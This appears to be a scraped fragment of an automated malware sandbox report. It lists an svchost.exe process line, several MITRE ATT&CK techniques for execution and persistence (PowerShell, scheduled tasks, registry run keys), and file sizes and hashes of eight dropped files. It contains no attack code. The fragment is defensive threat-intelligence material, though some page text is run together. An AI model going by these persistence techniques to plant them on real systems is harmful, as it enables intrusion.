C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4148
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD5c67441dfa09f61bca500bb43407c56b8
SHA15a56cf7cbeb48c109e2128c31b681fac3959157b
SHA25663082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33
SHA512325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8
-
Filesize
1KB
MD5273760112f1f2e60426631713dc50319
SHA13c1e9b5b5a7934720ae53ef6e844387860dd1e51
SHA256057dc9b8f7c35b6fb55f8a2618fb75057ada88a95629c4414ed67e9fc2542247
SHA51217d5f6244bf7e892b9b22c3ed72d44cc794e630e075038ea51c3e680298fb7110937416c741bd114431386eafa4fa41d8cec6b66515ca43b9ddf4d57cf0c5317
-
Filesize
1KB
MD585ce54ce614b625332ea3ccac4e0857f
SHA1dc8e80dd46b9cd6dd39bff3e281090f952973884
SHA2566814b74f3f95da7aa1de9f6e629aa3d908e3d1603f0a724bb3ae7ae381834e9c
SHA512a67866176a3123dcb2cd5b1013901a0a2abea37c375f6d62a508977ecb8da1b89645395b4955b318cbcbcc3db9d12f754a3795918c519c3ffbba7748dee5a01b
-
Filesize
3B
MD5df66fa563a2fafdb93cc559deb0a38c4
SHA1e6666cf8574b0f7a9ae5bccee572f965c2aec9cb
SHA2563e39ed22dc63246937c4dbbf34ce4fb1cfe6b00de7596b020cad49ae50031351
SHA51234ea05ee75cd840a94526411777868edb293a69867e1fdc2c2e917d278a3d58fcb86afc65142f4b184ce6907f04fb254a86061cfb620f01874b0b454a6f01c18
-
Filesize
79KB
MD5c410192a848f49befb5eadce93c721d8
SHA1ae716ed832e822d646503bafb81816634fcfc8ad
SHA2564f18502b6ca846e63158f410d48b5e17c23e82a4b4215cbef0d9790d29ebdbe5
SHA512c28fcff463566f16712dee6db6a4dca2e989b3883fc835c71fedf0a7db181ff60b0f25dd0c84779882a5ce5b3c3d74f4736437de9c38d4e7b738f02fdc3ee3b0
-
Filesize
70KB
MD568a5231ad845ddbf1068d17fa47d0096
SHA1e3ea3f411e7b3ea88b418b99e67fed3cb4ad1408
SHA256487948ed1783108708cc108e3a52b25022a6f10f9a236f427435588c62d76004
SHA51299364906b2902a9ffc0725cbad9032cb4597650cab1c7f6dce9786dd8cd4e753ed9485418d5390248b5c624ef1043c12411d65a8158d5db280b4e6bcf0c78d83
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82